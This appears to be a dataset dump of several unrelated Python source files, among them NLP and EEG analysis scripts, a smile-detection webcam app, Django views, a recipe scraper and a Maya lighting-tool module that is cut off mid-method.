text stringlengths 8 6.05M |
|---|
"""
commons.py
Author: Jan Zahalka (jan@zahalka.net)
Common utility functions used by various parts of the system.
"""
import time
def t():
"""
A timestamp for printouts.
Returns
-------
str
The timestamp.
"""
return "[" + str(time.strftime("%d %b, %H:%M:%S")) + "]"
def tf(seconds):
"""
Formats time in seconds to days, hours, minutes, and seconds.
Parameters
----------
seconds : float
The time in seconds.
Returns
-------
str
The formatted time.
"""
days = seconds // (60*60*24)
seconds -= days * 60*60*24
hours = seconds // (60*60)
seconds -= hours * 60*60
minutes = seconds // 60
seconds -= minutes * 60
tf = []
if days > 0:
tf.append("%s days" % int(days))
if hours > 0:
tf.append("%s hours" % int(hours))
if minutes > 0:
tf.append("%s minutes" % int(minutes))
tf.append("%s seconds" % round(seconds, 2))
return ", ".join(tf)
|
"""
This module contains functions that help rank airbnb comment topic vectors by similarity to user input.
That is, when views.py calls `Calculate_similarities`
This function in turn calls helper functions in this module.
The inputs are a string (representing the yourbnb.xyz user's preferences),
a pandas series of the mean topic vectors for each listing,
a dictionary of strings to numbers (that was used to encode the vocabulary in numerical form in the training of the LDA model)
and the LDA model itself.
More details in the functions themselves
"""
import gensim
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from gensim import corpora, models
import nltk
nltk.download('wordnet')
import pickle
import sklearn as sk
import numpy as np
# Path to pickle file for stemmer and lemmatizer.
# These are used to pre-process the textual input
# Alter path needed!
with open('/Users/bennett/Documents/GitHub/airbnb_insight_repo/airbnb_insight/Flask/MVP/nltk_dict.pkl', 'rb') as fp:
nltk_dict = pickle.load(fp)
SnowballStemmer = nltk_dict['stemmer']
stemmer = SnowballStemmer("english")
WordNetLemmatizer = nltk_dict['lemmatizer']
def _Elementwise_cosine_similarity(arr, ctv):
"""
given an array `arr` of shape (n_comments x n_topics) and a vector `ctv` of shape (n_topics,)
returns an array of cosine similarities between ctv and each row of arr
"""
return sk.metrics.pairwise.cosine_similarity(np.array(ctv).reshape(1, -1), arr)
def Calculate_similarities(fromUser='Default', listings = None, dictionary=None, model = None, langmod = None, elementwise = False):
"""
Inputs:
fromUser: a string (from the input page, representing the yourbnb.xyz user's preferences),
listings: if elementwise=False, a pandas series (n_listings x n_topics) representing the average topic vectors for each listing
if elementwise = True, the pandas series is a list-of-list-of-list (n_listings x comments_per_listing x n_topic)
dictionary: a list-of-str--> list-of-tuple (id, occurrences) dictionary to convert strings to a bag-of-words format
model: a pre-trained gensim LDA model
elementwise: boolean. If true, apply a cosine similarity function row-wise to sublists in `listings`
Outputs:
sims: cosine similarities between the user's topic vector and the comment vectors in `listings`
if elementwise = False, a len(n_listings) list-of-float.
if elementwise = Truem a list-of-list-of-float (n_listings x comments_per_listing)
comment_topic_vector: an array of shape(n_topics,). The topic vector encoding the fromUser string
"""
# preprocess input text, get the topic vector
comment_stem_lemma = Preprocess_text(fromUser)
comment_bow = dictionary.doc2bow(comment_stem_lemma)
comment_topic_vector = [tup[1] for tup in model[comment_bow]]
# calculate the similarities between user topic vector and listing topic vectors
# for each review
if elementwise:
sims = listings.apply(lambda x: _Elementwise_cosine_similarity(x, comment_topic_vector))
# for each topic vector averaged within listings
else:
sims = sk.metrics.pairwise.cosine_similarity(np.array(comment_topic_vector).reshape(1, -1), np.vstack(listings))[0]
if fromUser != 'Default':
return sims, comment_topic_vector
else:
return 'check your input'
def Preprocess_text(text):
result = []
for token in gensim.utils.simple_preprocess(text):
if token not in gensim.parsing.preprocessing.STOPWORDS and len(token) > 3:
result.append(lemmatize_stemming(token))
return result
def lemmatize_stemming(text):
return stemmer.stem(WordNetLemmatizer().lemmatize(text, pos='v'))
def _Model_sentence(sent, langmod):
for c in ['.', ',', '!', '?', ';', '-', '&', '(', ')', '$']:
sent = sent.replace(c, '')
vs = []
for w in sent.split(' '):
try:
vs.append(langmod[x])
except:
continue
return np.mean(vs, axis=0)
|
"""
=======================
Statistical Analysis
=======================
The MOABB codebase comes with convenience plotting utilities and some
statistical testing. This tutorial focuses on what those exactly are and how
they can be used.
"""
# Authors: Vinay Jayaram <vinayjayaram13@gmail.com>
#
# License: BSD (3-clause)
# sphinx_gallery_thumbnail_number = -2
import matplotlib.pyplot as plt
from mne.decoding import CSP
from pyriemann.estimation import Covariances
from pyriemann.tangentspace import TangentSpace
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
import moabb
import moabb.analysis.plotting as moabb_plt
from moabb.analysis.meta_analysis import ( # noqa: E501
compute_dataset_statistics,
find_significant_differences,
)
from moabb.datasets import BNCI2014_001
from moabb.evaluations import CrossSessionEvaluation
from moabb.paradigms import LeftRightImagery
moabb.set_log_level("info")
print(__doc__)
###############################################################################
# Results Generation
# ---------------------
#
# First we need to set up a paradigm, dataset list, and some pipelines to
# test. This is explored more in the examples -- we choose left vs right
# imagery paradigm with a single bandpass. There is only one dataset here but
# any number can be added without changing this workflow.
#
# Create Pipelines
# ----------------
#
# Pipelines must be a dict of sklearn pipeline transformer.
#
# The CSP implementation from MNE is used. We selected 8 CSP components, as
# usually done in the literature.
#
# The Riemannian geometry pipeline consists in covariance estimation, tangent
# space mapping and finally a logistic regression for the classification.
pipelines = {}
pipelines["CSP+LDA"] = make_pipeline(CSP(n_components=8), LDA())
pipelines["RG+LR"] = make_pipeline(Covariances(), TangentSpace(), LogisticRegression())
pipelines["CSP+LR"] = make_pipeline(CSP(n_components=8), LogisticRegression())
pipelines["RG+LDA"] = make_pipeline(Covariances(), TangentSpace(), LDA())
##############################################################################
# Evaluation
# ----------
#
# We define the paradigm (LeftRightImagery) and the dataset (BNCI2014_001).
# The evaluation will return a DataFrame containing a single AUC score for
# each subject / session of the dataset, and for each pipeline.
#
# Results are saved into the database, so that if you add a new pipeline, it
# will not run again the evaluation unless a parameter has changed. Results can
# be overwritten if necessary.
paradigm = LeftRightImagery()
dataset = BNCI2014_001()
dataset.subject_list = dataset.subject_list[:4]
datasets = [dataset]
overwrite = True # set to False if we want to use cached results
evaluation = CrossSessionEvaluation(
paradigm=paradigm, datasets=datasets, suffix="stats", overwrite=overwrite
)
results = evaluation.process(pipelines)
##############################################################################
# MOABB Plotting
# ----------------
#
# Here we plot the results using some of the convenience methods within the
# toolkit. The score_plot visualizes all the data with one score per subject
# for every dataset and pipeline.
fig = moabb_plt.score_plot(results)
plt.show()
###############################################################################
# For a comparison of two algorithms, there is the paired_plot, which plots
# performance in one versus the performance in the other over all chosen
# datasets. Note that there is only one score per subject, regardless of the
# number of sessions.
fig = moabb_plt.paired_plot(results, "CSP+LDA", "RG+LDA")
plt.show()
###############################################################################
# Statistical Testing and Further Plots
# ----------------------------------------
#
# If the statistical significance of results is of interest, the method
# compute_dataset_statistics allows one to show a meta-analysis style plot as
# well. For an overview of how all algorithms perform in comparison with each
# other, the method find_significant_differences and the summary_plot are
# possible.
stats = compute_dataset_statistics(results)
P, T = find_significant_differences(stats)
###############################################################################
# The meta-analysis style plot shows the standardized mean difference within
# each tested dataset for the two algorithms in question, in addition to a
# meta-effect and significance both per-dataset and overall.
fig = moabb_plt.meta_analysis_plot(stats, "CSP+LDA", "RG+LDA")
plt.show()
###############################################################################
# The summary plot shows the effect and significance related to the hypothesis
# that the algorithm on the y-axis significantly outperformed the algorithm on
# the x-axis over all datasets
moabb_plt.summary_plot(P, T)
plt.show()
|
from game.items.item import Hatchet
from game.skills import SkillTypes
class SteelHatchet(Hatchet):
name = 'Steel Hatchet'
value = 200
skill_requirement = {SkillTypes.woodcutting: 6}
equip_requirement = {SkillTypes.attack: 20}
damage = 122
accuracy = 316 |
# -*- coding:utf-8 -*-
class Solution:
def findBestValue(self, arr: list, target: int) -> int:
arr.sort()
less_idx = -1
for i in range(0, len(arr)):
the_sum = sum(arr[0:i]) + arr[i] * (len(arr)-i)
if the_sum >= target:
break
else:
less_idx = i
if (len(arr) - less_idx - 1) == 0 :
return arr[-1]
elif less_idx < 0:
a = target // len(arr)
else:
a = (target - sum(arr[0:less_idx + 1])) // (len(arr) - less_idx - 1)
if a < arr[less_idx]:
use_a = abs(a * (len(arr) - 0) - target)
else:
use_a = abs(sum(arr[0:less_idx+1]) + a * (len(arr)-less_idx-1) - target)
b = a+1
if b < arr[less_idx]:
use_b = abs(b * (len(arr) - 0) - target)
else:
use_b = abs(sum(arr[0:less_idx+1]) + b * (len(arr)-1-less_idx) - target)
if use_a <= use_b:
return a
else:
return b
print(Solution().findBestValue([1547,83230,57084,93444,70879],71237)) |
import cv2
import imutils
import time
import numpy as np
# Show debug info
debug = True
# if false an image of an dog is shown
showVideo = True
# set frame size
FrameWidth = 1280
FrameHeight = 720
# time to remind the user to smile
smileReminder = 15
# time the user has to smile
timeToSmile = 10
# Get webcam
cam = cv2.VideoCapture(0)
# # or get Video Stream
# cam = cv2.VideoCapture("http://192.168.178.21:8080/video?type=some.mjpg")
# # load funny image
# dog = cv2.imread('images/image.jpg')
# # or show video
# video1 = cv2.VideoCapture("videos/video.mp4")
# Create the haar cascade for face and smile recognition
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
smile_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_smile.xml')
# function to detect a face and a smile inside
def detectSmile(gray, frame):
# detect face
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
smileFound = False
# search in found faces
for (x, y, w, h) in faces:
if debug:
cv2.rectangle(frame, (x, y), ((x + w), (y + h)), (255, 0, 0), 2)
roi_gray = gray[y:y + h, x:x + w]
roi_color = frame[y:y + h, x:x + w]
# detect smiles
smiles = smile_cascade.detectMultiScale(roi_gray, 1.8, 20)
for (sx, sy, sw, sh) in smiles:
# smile found!
if debug:
cv2.rectangle(roi_color, (sx, sy), ((sx + sw), (sy + sh)), (0, 0, 255), 2)
smileFound = True
return frame, smileFound
# display debug info if enabled
def debugInfo(frame, smile):
# display total elapsed time in seconds
cv2.putText(frame, "Elapsed time: " + str(elapsedTotal), (5, FrameHeight - 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255))
# display time smiled
cv2.putText(frame, "Time smiled: " + str(timeSmiled), (5, FrameHeight - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255))
# display if smile detected or not
if(smile):
cv2.putText(frame, "Smile: Yes", (5, FrameHeight - 50), cv2.FONT_HERSHEY_SIMPLEX, 1,(0,0,255),2)
else:
cv2.putText(frame, "Smile: No", (5, FrameHeight - 50), cv2.FONT_HERSHEY_SIMPLEX, 1,(0,0,255),2)
# time since last rendered frame and start time
startTime = time.time()
prevTime = startTime
# calculate time since last smiling and current time smiled
sinceLastSmile = startTime
timeSmiled = 0
while True:
# Captures video_capture frame by frame
_, frame = cam.read()
# get current time
curTime = time.time()
# calculate elapsed time
elapsed = curTime - prevTime
# if more than 0.2 seconds elapsed, draw new frame ~ 5 frames per second
if(elapsed > 0.2):
# resize image for better performance
frame = imutils.resize(frame, width=FrameWidth, height=FrameHeight)
# reset frame timer
prevTime = curTime
# get total elapsed time
elapsedTotal = int(curTime - startTime)
# To capture image in monochrome
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# detect Smiles
frame, smileFound = detectSmile(gray, frame)
# if smile detected add smiled time
if(smileFound):
timeSmiled += elapsed
# if progress is complete, reset timer
if(timeSmiled > timeToSmile):
sinceLastSmile = curTime
timeSmiled = 0
# print debug info if enabled
if debug:
debugInfo(frame, smileFound)
# if not smiled for more than "smileReminder" seconds -> smile
elapsedSinceLastSmile = int(curTime - sinceLastSmile)
if(elapsedSinceLastSmile >= smileReminder):
# # offset for dog or video image
# offsetY = int((FrameWidth/4)*3)
# if showVideo:
# ret, smileVideoFrame = video1.read()
# if not (ret):
# video1.set(cv2.CAP_PROP_POS_FRAMES, 0)
# ret, smileVideoFrame = video1.read()
# # resize image for better performance
# smileVideoFrame = imutils.resize(smileVideoFrame, width=int(FrameWidth/4), height=int(FrameHeight/4))
# frame[0:smileVideoFrame.shape[0], offsetY:offsetY+smileVideoFrame.shape[1]] = smileVideoFrame
# else:
# dog = imutils.resize(dog, width=int(FrameWidth/4), height=int(FrameHeight/4))
# frame[0:dog.shape[0], offsetY:offsetY+dog.shape[1]] = dog
# Display text and current smile progress
cv2.putText(frame, "Progress: ", (5,60), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0))
cv2.rectangle(frame, (160, 40), (260, 60), (0, 0, 255), -1)
progressSmiled = timeSmiled * 10
cv2.rectangle(frame, (160, 40), (160 + int(progressSmiled), 60), (0, 255, 0), -1)
cv2.putText(frame, "Please smile :)", (5, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,0,0))
# Displays the result on camera feed
cv2.imshow('Video', frame)
# The control breaks once q key is pressed
if cv2.waitKey(1) & 0xff == ord('q'):
break
# Release the capture once all the processing is done.
cam.release()
cv2.destroyAllWindows()
|
# coding=utf-8
from django.db.models.query import QuerySet
from django.db.models.sql.query import Query
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic.edit import CreateView, UpdateView
from django.shortcuts import render_to_response, redirect
from django.views.generic.list import ListView
from abit.forms import AbitRequestForm
from abit.models import AbitRequest, EducationalForm, Speciality
from abit.dummy import Generator
class AddAbitRequestView(CreateView):
model = AbitRequest
template_name = 'abitrequest_form.html'
context_object_name = 'abit_form'
form_class = AbitRequestForm
success_url = '/abit/list/'
def form_valid(self, form):
inst = form.save(commit=False)
inst.creator = self.request.user
inst.save()
return redirect(self.success_url)
class AbitRequestListView(ListView):
# model = AbitRequest
template_name = 'reqslist.html'
context_object_name = 'abitrequest_list'
paginate_by = 50
def get_queryset(self):
return AbitRequest.objects.all().order_by('-date')
class EditAbitRequestView(UpdateView):
model = AbitRequest
template_name = 'abitrequest_form.html'
context_object_name = 'abit_form'
form_class = AbitRequestForm
success_url = '/abit/list/'
def reqcmp(x,y):
return -cmp(x.sum_bal,y.sum_bal)
class RatingListView(ListView):
template_name = 'rating.html'
context_object_name = 'abitrequest_list'
def getSpec(self):
if 'q' in self.request.GET:
return self.request.GET['q']
else:
return u'Економіка підприємства'
def get_queryset(self):
# self.args[0]
spec = self.getSpec()
spec = Speciality.objects.filter(name=spec).get()
# return HttpResponse(spec)
reqs = list(AbitRequest.objects.all().filter(speciality=spec))
reqs.sort(cmp=reqcmp)
reqs_priv = [ab for ab in reqs if ab.privilege]
reqs_priv.sort(cmp=reqcmp)
bugdet_priv_count = spec.budget / 4
if bugdet_priv_count == 0 and spec.budget != 0:
bugdet_priv_count = 1
i=0
if reqs_priv:
for r in reqs_priv:
if i < bugdet_priv_count:
reqs.remove(r)
reqs.insert(i,r)
i+=1
return reqs
def get_context_data(self, **kwargs):
context = super(RatingListView,self).get_context_data(**kwargs)
context['specs'] = Speciality.objects.all()
context['selected'] = self.getSpec()
return context
def Init(request):
g = Generator()
g.generateBase()
g.generateAbitRequests(request)
return HttpResponseRedirect('/abit/list/')
|
import sys, getopt, re
from subprocess import Popen, PIPE, STDOUT
opts = getopt.getopt( sys.argv[1:], 'f', ['file'] )
try:
file = opts[1][0]
except:
print '-f (--file) must be specified with a valid file path'
sys.exit( 2 )
stdout = Popen( '/usr/local/bin/ffmpeg -i '+file, shell=True, stdout=PIPE, stderr=STDOUT )
result = stdout.communicate()
print result[0]
|
import requests
from bs4 import BeautifulSoup
import re
import csv
from janome.tokenizer import Tokenizer
information=[]
html=requests.get('http://recipe.hacarus.com/')
soup=BeautifulSoup(html.text,'html.parser')
for news in soup.findAll('li'):
# 各メニューのURLを取得する
html2=requests.get('http://recipe.hacarus.com'+news.a.get("href"))
soup2=BeautifulSoup(html2.content,'html.parser')
header=soup2.header.p.string
#調理時間を取得する
cooktime=header.replace(" ","").replace("(","").replace(")","").strip()
recipe=re.split('[\n分]', cooktime)
del recipe[0::2]
#時間表記の場合、分表記に変換する
m=re.search('時間',recipe[0])
if m:
b=recipe[0].strip("時間以上")
recipe[0]=int(b)*60
#調理時間を数値整数型に変換
recipe[0]=int(recipe[0])
#材料数を取得する
ingredient=len(soup2.tbody.findAll('tr'))
soup2.tbody.name="tbody1"
recipe.append(ingredient)
#作り方の手順の数を取得する
cookway=len(soup2.tbody.findAll('tr'))
recipe.append(cookway)
#レシピの説明文を取得
sentence1= soup2.figcaption.p.string.replace(" ","").strip()
sentence2=soup2.find_all("div",class_="content")[2].text.replace(" ","").replace("\n","").replace("ポイント","").strip()
sentence=sentence1+sentence2
#形態解析をして使われている名詞を頻出頻度の高い順に並べる
t=Tokenizer()
word_dic={}
tokens=t.tokenize(sentence)
for w in tokens :
word=w.surface
ps=w.part_of_speech
if (re.match('名詞,(一般|固有名詞|サ変接続|形容動詞語幹)',ps)):
if not word in word_dic:
word_dic[word]=0
word_dic[word]+=1
keys=sorted(word_dic.items(),key=lambda x:x[1],reverse=True)
for word1,cnt in keys[:3]:
recipe.append(word1)
# 収集した情報を格納
information.append(recipe)
with open('recipe.csv','w') as f:
writer=csv.writer(f)
writer.writerow(['cooktime','ingredients','cookway','keyword'])
writer.writerows(information)
|
# !/usr/bin/python
"""
-----------------------------------------------
Bardel Shot Light Core
Written By: Colton Fetters
Version: 1.2
First release:
-----------------------------------------------
"""
# Import module
import os.path
import maya.OpenMaya as om
import maya.cmds as cmds
import maya.mel as mel
import pymel.core as pm
import slt
import imp
# DW module
import light.menu.lightingDock
from light.v2.HUB.xgen import xgenReference
from light.tools.shotLightProps import ui
# Studio module
import farm.bd_deadline_submitter
import bd_lib.bd_main_lib as main_lib
from bd_lib.bd_config_lib import config
from bd_lib.bd_save_controller import SaveController
from bd_lay.bd_scene_info import SceneInfo
from validate import lrc
from bd_light import bd_prop_lightingUI
from sec_viewer import camera_sec_viewer as camera_sec_viewer
from bd_propagator import shot_prop as shot_prop
from gi_bake import gi_bake_tool_002 as gi_bake
from prop_set_tool import prop_set_tool_002 as prop_set
from prop_set_tool import prop_tool_box as tool_box_m
from auto_layer import layers_clean_002 as auto_layer_m
from auto_layer import auto_layer_core as auto_layer_core_m
from dock_control_tool import dockAnyWindow as dock_m
from set_checker import universal_set_fixer
# Show module
import bd_light_tool.utils.date_time as datetime_m
import bd_light_tool.utils.character_rims as rims_m
import bd_light_tool.utils.shot_light_creator as creator_m
import bd_light_tool.utils.shader_adjustments as shader_m
import bd_light_tool.utils.file_browser_tools as file_m
import bd_light_tool.utils.light_tweaker as tweak_m
# TODO
import dtx_lrc_tools.key_light_fix as light_fix
import dtx_lrc_tools.world_pref_creator as world_pref
import dtx_asset_tools.texture_swap as tx_fix
import pib_tools.lighting_tools.shot_loader_tool.shot_loader as shot_load_m
import wds_tools.lrc.MazeCavesFxSetup as MazeCavesFxSetup
import mj_tools.WDS_eyeSpec as spec
reload(lrc)
reload(camera_sec_viewer)
reload(shot_prop)
reload(gi_bake)
reload(prop_set)
reload(tool_box_m)
reload(auto_layer_m)
reload(auto_layer_core_m)
reload(dock_m)
reload(rims_m)
reload(creator_m)
reload(shader_m)
reload(file_m)
reload(light_fix)
reload(world_pref)
reload(tx_fix)
class Core(object):
def __init__(self, ui=None):
self._WORK_SPACE = cmds.workspace(fullName=True)
self._SHOW = os.getenv('BD_PROD')
self.ui = ui
self._TIME_DIFFERENCE = 1
self._FAR_CLIP = 100000
self._NEAR_CLIP = 1
self._EP_TOOLS = 'B:\\artists\\current\\src\\{}_tools\\lrc\\episodic_tools\\Episode_'.format(self._SHOW)
self._RESET_CONFIG = (os.path.join(config.get('project_path'), 'sys/validate/config.json'))
def directory_buttons_click(self, choose):
file_m.Core().directory_buttons_click(choose)
# UI FUNCTIONALITY
def window_refresher(self, state):
"""
Pauses the maya interface for faster operations to take place
:param state: if True it disables the interface, False re enables it
:return: None
"""
cmds.refresh(su=state)
if state:
om.MGlobal.displayInfo('Window Refresh Deactivated')
else:
om.MGlobal.displayInfo('Window Refresh Activated')
return state
# Shot Setup -PRE PROCESS SHOT-
def launch_scene_picker(self, *args):
"""
Loads Legacy BD Shot Loader Tool
:param args: Button
:return: None
"""
if self.ui is not None:
shot_load_m.shot_loaderUI().main()
result = 'Success - Finding Shot'
pm.scrollField(self.ui.printedInfo, text=result, e=True)
def dw_prop_light_tool(self, *args):
ui.Window().run()
def dw_light_tool(self, *args):
"""
Loads DW Shot Light Tool
:param args:Button
:return:
"""
if "DTX" in self._SHOW:
slt.run_dtx()
elif "WDS" in self._SHOW:
slt.run_wds()
def increment_save(self, *args):
"""
Increment Save with out UI
:param args: Button
:return:None
"""
if self.ui is not None:
# Set main viewport for quick opening closing
cmds.modelEditor('modelPanel4', e=True, displayAppearance='boundingBox')
cmds.modelEditor('modelPanel4', e=True, allObjects=0)
cmds.modelEditor('modelPanel4', e=True, polymeshes=True)
cmds.modelEditor('modelPanel4', e=True, lights=True)
# Gather info to save properly on the BD pipeline
save_info = SaveController(main_lib.file_manager,
main_lib.scene_manager,
main_lib.notes_manager,
main_lib.animation_manager,
main_lib.ui_manager)
# Save command
save_info.increment_version(save_type="save", require_note=False,)
pm.scrollField(self.ui.printedInfo, text="Success - Increment Save", e=True)
def load_all_references(self, *args):
"""
Loads all the references in the scene
:param args: Button
:return: tells the user
"""
references = cmds.file(q=True, r=True, list=True)
referencesLoaded = list()
for reference in references:
# Parse through the file list
if '.ma' in reference:
if cmds.file(reference, deferReference=True, q=True):
# queries the status of the shot
print("{} is currently unloaded!".format(reference))
cmds.file(reference, loadReference='%s' % reference)
# references the .ma files that are not loaded
elif '.tx' or '.exr' or '.tif' or '.jpg' in reference:
pass
else:
cmds.warning('Reference has improper extension type\n{}'.format(reference))
referencesLoaded.append(reference + ' Loaded Reference')
return referencesLoaded
def set_render_globals(self, *args):
"""
Sets BD Render Globlas
:param args: Button
:return: None
"""
cmds.colorManagementPrefs(cmEnabled=True, edit=True)
try:
cmds.setAttr('vraySettings.cam_environmentVolumeOn', 0)
setup = main_lib.render_manager.render_globals_setup
setup.set_render_globals()
return "Render Globals success"
except RuntimeError:
cmds.warning("Render Globals failed")
def sec_anim_checker(self, *args):
"""
Checks the Anim file against the Sec file
:return: Returns the result to the user on ui or standalone
"""
mayaPath = cmds.file(q=True, sceneName=True)
sceneInfo = SceneInfo(mayaPath)
season = sceneInfo.season
episode = sceneInfo.episode
seq = sceneInfo.seq
shot = sceneInfo.shot
animFile = '{}_{}{}_{}_{}_Anim_BD.ma'.format(self._SHOW, season, episode, seq, shot)
wipPath = sceneInfo.get_root_dir()
animPath = (sceneInfo.get_dir()).split('WIP')[0]
secPath = '{}/Sec'.format(wipPath)
mayaSecFiles = os.listdir(secPath)
if mayaSecFiles == []:
result = 'FAILED - No Sec Files Yet'
return result
else:
try:
mayaSecFiles.remove('Thumbs.db')
mayaSecFiles.remove('.mayaSwatches')
except:
pass
mayaSecFiles.sort()
latestSecShot = mayaSecFiles[-1:][0]
self._SEC_FILE = os.path.normpath('{}/{}'.format(secPath, latestSecShot))
self._ANIM_FILE = os.path.normpath('{}{}'.format(animPath, animFile))
# If you have a scene open the above code will execute, otherwise nothing will happen
if os.path.exists(self._SEC_FILE):
secTime = datetime_m.get_file_modified_time(self._SEC_FILE)
secDay = datetime_m.get_file_modified_day(self._SEC_FILE)
secMonth = datetime_m.get_file_modified_month(self._SEC_FILE)
secYear = datetime_m.get_file_modified_year(self._SEC_FILE)
animTime = datetime_m.get_file_modified_time(self._ANIM_FILE)
animDay = datetime_m.get_file_modified_day(self._ANIM_FILE)
animMonth = datetime_m.get_file_modified_month(self._ANIM_FILE)
animYear = datetime_m.get_file_modified_year(self._ANIM_FILE)
# run all checks on file date and time creation - year, month, day
if secYear == animYear and secMonth == animMonth and secDay == animDay:
timeDiff = datetime_m.get_time_difference(secTime, animTime)
splitDiff = str(timeDiff).split(':')
s = 'Sec/Anim save time difference is {2} Hours, {1} Mins, {0} Secs'
om.MGlobal.displayInfo(s.format(splitDiff[2], splitDiff[1], splitDiff[0]))
if splitDiff[0] < self._TIME_DIFFERENCE:
result = 'FAILED - Out Of Date'
else:
result = 'Success'
else:
om.MGlobal.displayWarning('SEC = %s < BAD > ANIM = %s' % (secTime, animTime))
result = 'FAILED - Out Of Date'
else:
result = 'FAILED - No Sec Files Yet'
return result
return result
def set_far_near_clip_settings(self, *args):
cmds.setAttr('perspShape.farClipPlane', self._FAR_CLIP)
cmds.setAttr('perspShape.nearClipPlane', self._NEAR_CLIP)
cmds.setAttr('vraySettings.cam_environmentVolumeOn', 0)
def reset_attributes(self, *args):
lrc.reset_factory_settings(self._RESET_CONFIG)
def reference_xgen(self, *args):
try:
light.menu.lightingDock.main()
xgenReference.Window().run()
xgenReference.Window().close()
result = '- Xgen Exists'
except:
result = '- No Xgen on show'
return result
# Shot Light Modification -CAMERA ADJUSTMENTS-
def enable_camera_shake(self, *args):
lrc.overscan()
pm.scrollField(self.ui.printedInfo, text='Success - OverScan Setup', e=True)
def revert_camera_shake(self, *args):
lrc.re_overscan()
pm.scrollField(self.ui.printedInfo, text='Success - Removed OverScan', e=True)
def enable_secondary_cam(self, *args):
try:
camera_sec_viewer.SecViewerTool().cameraSec_UI()
pm.scrollField(self.ui.printedInfo, text='Success - Secondary Created', e=True)
except:
cmds.warning('No 3D Viewport Selected')
def toggle_xgen(self, *args):
viewerStatus = cmds.modelEditor('modelPanel4', query=True, pluginShapes=True)
if viewerStatus:
cmds.modelEditor('modelPanel4', edit=True, pluginShapes=False)
pm.scrollField(self.ui.printedInfo, text="Success - Xgen Display OFF", e=True)
else:
cmds.modelEditor('modelPanel4', edit=True, pluginShapes=True)
pm.scrollField(self.ui.printedInfo, text="Success - Xgen Display ON", e=True)
# Shot Light Modification -LIGHT ADJUSTMENTS-
def widen_rims_lights(self, *args):
rims_m.widen_rims_onlayer()
pm.scrollField(self.ui.printedInfo, text='Success - Widden Rims', e=True)
def narrow_rims_lights(self, *args):
rims_m.narrow_rims_onlayer()
pm.scrollField(self.ui.printedInfo, text='Success - Narrow Rims', e=True)
def change_lights_post(self, *args):
light_fix.ReLight().UI()
pm.scrollField(self.ui.printedInfo, text='Success - Modifying Lights', e=True)
# TODO Clean this up
def add_light_to_pass(self, *arg):
c_render_layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
render_layer_members = cmds.editRenderLayerMembers(c_render_layer, query=True)
selfselect = cmds.ls(sl=True, dag=True, sn=True, v=True, type='transform')
for l in selfselect:
lgt = mel.eval('vrayAddRenderElement LightSelectElement')
# rename light select pass to Lights
ToLightWorld = cmds.rename(lgt, '{}_{}'.foramt(self._SHOW, 1))
# rename light selects to Diffuse
cmds.setAttr(ToLightWorld + ".vray_name_lightselect", l, type='string')
# Change light Light type to Diffuse
cmds.setAttr(ToLightWorld + ".vray_type_lightselect", 0)
cmds.connectAttr(l + '.instObjGroups', ToLightWorld + '.dagSetMembers', f=True, na=True)
cmds.select(clear=True)
for each_member in render_layer_members:
cmds.setAttr("vraySettings.dmcThreshold", 0.004)
cmds.editRenderLayerAdjustment("vraySettings.dmcThreshold")
cmds.setAttr("vraySettings.dmcMaxSubdivs", 50)
pm.scrollField(self.ui.printedInfo, text='Success - Added Light To Pass', e=True)
# TODO clean this up
def light_diffuse_spec(self, *arg):
c_render_layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
render_layer_members = cmds.editRenderLayerMembers(c_render_layer, query=True)
selfselect = cmds.ls(sl=True, dag=True, sn=True, v=True, type='transform')
for l in selfselect:
# Create a diffuse component for the light
# create light select passes
lgt = mel.eval('vrayAddRenderElement LightSelectElement')
# rename light select pass to Lights
ToLightWorld = cmds.rename(lgt, self._SHOW + l + '_Dif')
# rename light selects to Diffuse
cmds.setAttr(ToLightWorld + ".vray_name_lightselect", l + '_Diffuse', type='string')
# Change light Light type to Diffuse
cmds.setAttr(ToLightWorld + ".vray_type_lightselect", 2)
cmds.connectAttr(l + '.instObjGroups', ToLightWorld + '.dagSetMembers', f=True, na=True)
# create light select passes
lgt = mel.eval('vrayAddRenderElement LightSelectElement')
# rename light select pass to Lights
ToLightWorld = cmds.rename(lgt, self._SHOW + l + '_Spec')
# rename light selects to Diffuse
cmds.setAttr(ToLightWorld + ".vray_name_lightselect", l + '_Specular', type='string')
# Change light Light type to Diffuse
cmds.setAttr(ToLightWorld + ".vray_type_lightselect", 3)
cmds.connectAttr(l + '.instObjGroups', ToLightWorld + '.dagSetMembers', f=True, na=True)
for each_member in render_layer_members:
cmds.setAttr("vraySettings.dmcThreshold", 0.004)
cmds.editRenderLayerAdjustment("vraySettings.dmcThreshold")
cmds.setAttr("vraySettings.dmcMinSubdivs", 3)
cmds.setAttr("vraySettings.dmcMaxSubdivs", 40)
pm.scrollField(self.ui.printedInfo, text='Success - Added Light to Diffuse', e=True)
# Shot Creations -LAYER CREATION-
def set_checker(self, *args):
if self._SHOW == 'DTX':
universal_set_fixer.LayerQuery().layerChecker()
if self._SHOW == 'WDS':
MazeCavesFxSetup.run()
pm.scrollField(self.ui.printedInfo, text='Success - Ran Set Checker', e=True)
def set_selection(self, *args):
prop_set.SetSelectionTool().main()
pm.scrollField(self.ui.printedInfo, text="Success - Launch Set Selection", e=True)
def set_selection_tool_box(self, *args):
tool_box_m.PropSet().prop_ui()
pm.scrollField(self.ui.printedInfo, text="Success - Launch Tool Box", e=True)
def auto_layer(self, *args):
auto_layer_m.AutoLayerTool().querySel()
pm.scrollField(self.ui.printedInfo, text="Success - Layer Generation", e=True)
def prop_lighting_tool(self, *args):
bd_prop_lightingUI.main()
pm.scrollField(self.ui.printedInfo, text="Success - Prop Light", e=True)
def interactive_lighting_tool(self, *args):
creator_m.InteractiveLight().input_UI()
pm.scrollField(self.ui.printedInfo, text="Success - Interactive Light", e=True)
def matte_layer(self, *args):
